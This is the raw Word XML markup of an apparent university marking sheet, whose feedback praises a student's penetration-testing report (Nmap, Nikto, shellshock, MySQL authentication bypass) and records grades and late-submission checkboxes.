            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">You have discuss application of the methods, tools and technique used to carry out all your tests.  Documentation, analysis and evaluation of the tests were done. The penetration testing of the live website covers: Information gathering such as using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>NMap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> to retrieve IP addresses and FQDN, website </w:t>
            </w:r>
            <w:r w:rsidR="00B70A2A" w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> scanning using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> tool, various exploits such as forced browsing attack, shellshock exploit, MySQL authentication </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>ByPass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B70A2A" w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>vulnerability</w:t>
            </w:r>
            <w:bookmarkStart w:id="85" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="85"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>, etc. (Grade mark: 98.33%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6897A633"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CCFE864"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r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="1D6158EE" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49DE1BC9" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C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DCD558"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F17D50"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0D5FE3FC" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="3A9D6778" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">5. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Transferable Skills for Life and Professional Practice</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43974B99" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C3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E3C00BB"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F4B8BB" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="4426AD42" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32B9EC60" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">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21ADF0B3"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8F7C3FE"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r>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="694BB1AA" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AD1897B" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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93F89D" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C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B5A370" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17EBA685" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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6C31" w:rsidRPr="00556C31" w14:paraId="389270C2" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="465FF509" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Assignment Mark </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00556C3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48475D"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b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Late Submission Penalties (tick if appropriate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71E6A69B" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>97%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="4BEF5FAE" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="64FCA468" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4B3C1321"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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Up to four weeks late</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5AB6C1A9" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="30306715" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="71" w:left="156"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="183C0393" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="393661E4" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="76562CD6" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>First Attempt?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6302F2BE" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="03275D89" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLineChars="141" w:firstLine="282"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5161D7B9" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9C414F" w14:textId="7D52BACB" w:rsidR="00C5650F" w:rsidRPr="009B0288" w:rsidRDefault="00C5650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C5650F" w:rsidRPr="009B0288" w:rsidSect="00556C31">
      <w:footerReference w:type="default" r:id="rId42"/>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Lohit Devanagari">
    <w:altName w:val="Mangal"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80008023" w:usb1="00002042" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E0000AFF" w:usb1="500078FF" w:usb2="00000021" w:usb3="00000000" w:csb0="600001BF" w:csb1="DFF70000"/>
  </w:font>
  <w:font w:name="Noto Sans CJK SC">
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="30000083" w:usb1="2BDF3C10" w:usb2="00000016" w:usb3="00000000" w:csb0="602E0107"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1B361A" w14:textId="1A410BC0" w:rsidR="00556C31" w:rsidRDefault="00556C3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B70A2A">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>48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70A2A">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>49</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="6CF76C0B" w14:textId="77777777" w:rsidR="00556C31" w:rsidRDefault="00556C31">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DC354" w14:textId="3DEBA523" w:rsidR="00556C31" w:rsidRDefault="00556C3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70A2A">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>49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70A2A">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>49</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="0C5B2F4E" w14:textId="77777777" w:rsidR="00556C31" w:rsidRDefault="00556C31">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86D85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D2416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313D14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D512B6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2D098A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D2416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BF04D3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DBFE19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9E724E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71541B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FBA0092"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="939442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DB9F86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55DB9F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CF108AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3844D7D0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>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6"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>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50F"/>
    <w:rsid w:val="BF6EBEA6"/>
    <w:rsid w:val="EBFB6F4E"/>
    <w:rsid w:val="0000117F"/>
    <w:rsid w:val="00006C19"/>
    <w:rsid w:val="00006CB1"/>
    <w:rsid w:val="00006F88"/>
    <w:rsid w:val="00010553"/>
    <w:rsid w:val="00026417"/>
    <w:rsid w:val="000342B1"/>
    <w:rsid w:val="00037646"/>
    <w:rsid w:val="00042A29"/>
    <w:rsid w:val="0004714F"/>
    <w:rsid w:val="0005149A"/>
    <w:rsid w:val="00053D38"/>
    <w:rsid w:val="000542B1"/>
    <w:rsid w:val="00057B06"/>
    <w:rsid w:val="0006069D"/>
    <w:rsid w:val="00060ABD"/>
    <w:rsid w:val="00065288"/>
    <w:rsid w:val="00071E12"/>
    <w:rsid w:val="00077909"/>
    <w:rsid w:val="000B348B"/>
    <w:rsid w:val="000B356A"/>
    <w:rsid w:val="000C52AA"/>
    <w:rsid w:val="000D2880"/>
    <w:rsid w:val="000D59C0"/>
    <w:rsid w:val="000D7992"/>
    <w:rsid w:val="000E05DE"/>
    <w:rsid w:val="000E336C"/>
    <w:rsid w:val="000E3B00"/>
    <w:rsid w:val="000F03A3"/>
    <w:rsid w:val="000F208D"/>
    <w:rsid w:val="000F4577"/>
    <w:rsid w:val="000F467B"/>
    <w:rsid w:val="000F6C2E"/>
    <w:rsid w:val="00102D1F"/>
    <w:rsid w:val="00105B96"/>
    <w:rsid w:val="001076BC"/>
    <w:rsid w:val="00112D00"/>
    <w:rsid w:val="001172DC"/>
    <w:rsid w:val="00117F85"/>
    <w:rsid w:val="0012247C"/>
    <w:rsid w:val="0012316E"/>
    <w:rsid w:val="00124D8C"/>
    <w:rsid w:val="001318E2"/>
    <w:rsid w:val="00142C54"/>
    <w:rsid w:val="00143D10"/>
    <w:rsid w:val="001500AD"/>
    <w:rsid w:val="00150639"/>
    <w:rsid w:val="00151C33"/>
    <w:rsid w:val="001520A9"/>
    <w:rsid w:val="00153E43"/>
    <w:rsid w:val="00155D1D"/>
    <w:rsid w:val="00161404"/>
    <w:rsid w:val="00167EC1"/>
    <w:rsid w:val="001706CB"/>
    <w:rsid w:val="00176EDE"/>
    <w:rsid w:val="001804F0"/>
    <w:rsid w:val="00184A91"/>
    <w:rsid w:val="00185D20"/>
    <w:rsid w:val="00187177"/>
    <w:rsid w:val="0018739B"/>
    <w:rsid w:val="001913B4"/>
    <w:rsid w:val="00195EE2"/>
    <w:rsid w:val="001A3898"/>
    <w:rsid w:val="001A3BE5"/>
    <w:rsid w:val="001A4153"/>
    <w:rsid w:val="001A5246"/>
    <w:rsid w:val="001B068C"/>
    <w:rsid w:val="001B4DA5"/>
    <w:rsid w:val="001C388D"/>
    <w:rsid w:val="001C3A46"/>
    <w:rsid w:val="001E6B62"/>
    <w:rsid w:val="001F1C58"/>
    <w:rsid w:val="00211211"/>
    <w:rsid w:val="002116D9"/>
    <w:rsid w:val="00211E5D"/>
    <w:rsid w:val="00212456"/>
    <w:rsid w:val="002138EA"/>
    <w:rsid w:val="002144DC"/>
    <w:rsid w:val="002177C0"/>
    <w:rsid w:val="00217832"/>
    <w:rsid w:val="002203B2"/>
    <w:rsid w:val="00222203"/>
    <w:rsid w:val="002222E9"/>
    <w:rsid w:val="002312EB"/>
    <w:rsid w:val="002342DE"/>
    <w:rsid w:val="00244FB3"/>
    <w:rsid w:val="002521AB"/>
    <w:rsid w:val="00252940"/>
    <w:rsid w:val="00252C40"/>
    <w:rsid w:val="00267067"/>
    <w:rsid w:val="00275F6C"/>
    <w:rsid w:val="0028616E"/>
    <w:rsid w:val="002903CC"/>
    <w:rsid w:val="00291C18"/>
    <w:rsid w:val="00293D05"/>
